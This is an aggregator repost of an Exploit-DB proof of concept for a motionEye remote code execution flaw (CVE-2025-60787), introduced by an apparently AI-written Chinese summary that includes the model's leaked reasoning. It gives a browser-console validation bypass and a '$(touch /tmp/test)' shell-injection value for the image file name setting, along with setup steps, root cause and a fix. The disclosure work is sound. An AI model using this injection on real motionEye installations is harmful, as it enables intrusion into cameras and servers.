[webapps] motionEye 0.43.1b4 - RCE
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,并且不需要特定的开头。首先,我得仔细阅读用户提供的文章内容,理解其中的关键信息。 文章标题是“motionEye 0.43.1b4 - RCE”,看起来这是一个远程代码执行的漏洞。作者是prabhatverma47,测试日期是2025年5月14日,提交日期是2025年10月11日。受影响的版本是motionEye <= 0.43.1b4,测试环境是Debian主机运行Docker容器。 文章描述了通过绕过motionEye web UI的客户端验证来实现RCE。具体来说,攻击者可以覆盖JavaScript验证函数,将任意值(包括shell注入语法)保存到motion配置中。当motion重启时,配置会被解析并执行嵌入的shell命令。 安全PoC部分展示了如何创建一个无害的文件/tmp/test。环境设置包括启动Docker容器、验证版本和访问Web UI。复现步骤包括在浏览器控制台中绕过验证、输入payload以及验证结果。 漏洞的根本原因是UI存储了未经过滤的值到配置文件中,这些值被motion解析时执行了shell命令。修复建议是对文件名进行过滤或使用白名单。 现在,我需要将这些信息浓缩到100字以内。重点包括:漏洞名称、影响版本、攻击方式(绕过客户端验证)、利用方法(修改配置触发命令执行)、CVE编号和修复建议。 可能的总结结构:motionEye <= 0.43.1b4 存在RCE漏洞,通过绕过客户端JS验证,在配置中注入shell代码执行任意命令。CVE-2025-60787已记录,建议过滤输入字符以修复。 检查字数是否在限制内,并确保涵盖关键点:漏洞名称、版本、攻击方式、影响、CVE和修复。 </think> motionEye 0.43.1b4 存在远程代码执行漏洞(RCE),通过绕过客户端 JavaScript 验证功能,在配置中注入恶意 shell 代码以执行任意命令。此漏洞影响所有 <= 0.43.1b4 的版本,并已被记录为 CVE-2025-60787。建议对输入字符进行过滤或使用白名单机制以修复该问题。 2026-2-11 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:5 收藏 
# Exploit Title: motionEye 0.43.1b4 - RCE 
# Exploit PoC: motionEye RCE via client-side validation bypass (safe PoC)
# Filename: motioneye_rce_poc_edb.txt
# Author: prabhatverma47
# Date tested: 2025-05-14 (original test); prepared for submission: 2025-10-11
# Affected Versions: motionEye <= 0.43.1b4
# Tested on: Debian host running Docker; motionEye image ghcr.io/motioneye-project/motioneye:edge
# CVE(s) / References: MITRE/OSV advisories referenced: CVE-2025-60787 
#
# Short description:
# Client-side validation in motionEye's web UI can be bypassed via overriding the JS validation
# function. Arbitrary values (including shell interpolation syntax) can be saved into the
# motion config. When motion is restarted, the motion process interprets the config and
# can execute shell syntax embedded inside configuration values such as "image_file_name".
#
# Safe PoC: creates a harmless file /tmp/test inside container (non-destructive).
#
# Environment setup:
# 1) Start the motionEye docker image:
#    docker run -d --name motioneye -p 9999:8765 ghcr.io/motioneye-project/motioneye:edge
#
# 2) Verify version in logs:
#    docker logs motioneye | grep "motionEye server"
#    Expect: 0.43.1b4 (or <= 0.43.1b4 for vulnerable)
#
# 3) Access web UI:
#    Open http://127.0.0.1:9999
#    Login: admin (blank password in default/edge image)
#
# Reproduction (manual + safe PoC):
# A) Bypass client-side validation in browser console:
#    1) Open browser devtools on the dashboard (F12 / Ctrl+Shift+I).
#    2) In the Console tab paste and run:
#
#       configUiValid = function() { return true; };
#
#    This forces the UI validation function to always return true and allows any value
#    to be accepted by the UI forms.
#
# B) Safe payload (paste this into Settings → Still Images → Image File Name and Apply):
#    $(touch /tmp/test).%Y-%m-%d-%H-%M-%S
#
#    After applying, the PoC triggers creation of /tmp/test inside the motionEye container
#    (the "touch" is executed when motion re-reads the config / motionctl restarts).
#
# C) Verify from host:
#    docker exec -it motioneye ls -la /tmp | grep test
#
# Expected result:
#    /tmp/test exists (created with the permissions of the motion process).
#
# Notes / root cause:
# - UI stores un-sanitized values into camera-*.conf (e.g., picture_filename),
#   which are later parsed by motion and interpreted as filenames – shell meta is executed.
# - Fix: sanitize/whitelist filename characters (example sanitization provided in README).
#
# References:
# - Original PoC & writeup: https://github.com/prabhatverma47/motionEye-RCE-through-config-parameter
# - motionEye upstream: https://github.com/motioneye-project/motioneye
# - OSV/GHSA advisories referencing this issue (published May–Oct 2025)
# - NVD entries: CVE-2025-60787

文章来源: https://www.exploit-db.com/exploits/52481
如有侵权请联系:admin#unsafe.sh